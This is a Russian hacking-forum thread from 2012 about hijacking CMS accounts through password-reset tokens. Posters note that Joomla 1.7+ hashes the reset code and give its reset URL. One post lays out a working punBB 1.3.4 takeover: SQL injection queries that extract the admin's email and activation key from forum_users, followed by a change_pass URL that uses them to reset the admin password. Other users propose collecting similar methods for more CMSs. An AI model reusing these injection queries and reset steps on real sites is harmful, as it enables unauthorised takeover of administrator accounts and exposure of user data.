Войти или зарегистрироваться
Выберите удобный способ — аккаунт создастся автоматически.
Или войдите по логину и паролю
 |
|

08.11.2012, 16:53
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Ааааааа, ну зачем-зачем-зачем ты спалил!!
Сообщение от blesse
Кстати а как с джумлой обстоят дела?Там же тоже должно катить.
с 1.7 в базе код восстановления хеширован.
|
|
|

08.11.2012, 20:09
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
ну раз с WP раскрылась тема то и до джумлы доберутся)
вообщем в таблице юзеров есть такая колонка "activation" вней появляются значение захешированое, в моем примере для теста я зарегался на одном из уязвимых сайтов и востонавил пасс, до востановления там был такой хешь "521608068f705c84e225b8bc30e387d6:$1$e47b7a03$"
на почту пришел такой хешь "985255f8d4bbe03c95ec3b144fc43da8" т.е это хешь под хешом что приведен выше, и чтобы его получить прийдется его сбрутить!
форма ввода данного кода: /index.php?option=com_user&view=reset&layout=confir m
|
|
|

09.11.2012, 02:56
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от winstrool
ну раз с WP раскрылась тема то и до джумлы доберутся)
вообщем в таблице юзеров есть такая колонка "
activation
" вней появляются значение захешированое, в моем примере для теста я зарегался на одном из уязвимых сайтов и востонавил пасс, до востановления там был такой хешь "
521608068f705c84e225b8bc30e387d6:$1$e47b7a03$
"
на почту пришел такой хешь "
985255f8d4bbe03c95ec3b144fc43da8
" т.е это хешь под хешом что приведен выше, и чтобы его получить прийдется его сбрутить!
форма ввода данного кода: /index.php?option=com_user&view=reset&layout=confir m
Так 100 лет можно брутить хэш.
|
|
|

09.11.2012, 08:21
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 16
С нами:
9176038
Репутация:
8
|
|
Короче походу все мои исследования, что я по ретриву проводил пора выкидывать в мусорку... Дальше так и пойдёт....
|
|
|

10.11.2012, 18:31
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от kingbeef
Так 100 лет можно брутить хэш.
раньше открытые были, потом пофиксели с какойто версии.
|
|
|

20.11.2012, 00:29
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
продолжу тему раз уж нато пошло
форум punBB 1.3.4
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]forum_users[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]limit[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
получаем
Сообщение от None
2:Администратор:емеил@list.ru
идём на страницу востановления пароля
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//сайт.ру/forum/login.php?action=forget[/COLOR][/COLOR]
вводим емеил, далее
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]activate_key[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]forum_users[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]limit[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
получам
Сообщение от None
2:uEH7Wftq
далее меняем пароль
Сообщение от None
http://сайт.ру/forum/profile.php?action=change_pass&id=
2
&key=
uEH7Wftq
|
|
|

20.11.2012, 10:38
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Тогда можно переименовать тему, и посвятить ее способам на других CMS.
|
|
|

20.11.2012, 13:10
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 16
С нами:
9176038
Репутация:
8
|
|
Не торопитесь, ребят, скоро в ветке Уязвимости выложу весь свой труд по этому направлению - там всё и будет...
|
|
|

21.11.2012, 16:11
|
|
Новичок
Регистрация: 15.08.2012
Сообщений: 0
С нами:
7232726
Репутация:
0
|
|
Да можно создать тему
|
|
|

21.11.2012, 16:57
|
|
Познающий
Регистрация: 25.10.2012
Сообщений: 61
С нами:
7130486
Репутация:
0
|
|
Сообщение от BigBear
Не торопитесь, ребят, скоро в ветке Уязвимости выложу весь свой труд по этому направлению - там всё и будет...
может не стоит?) захэшируют же все))
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|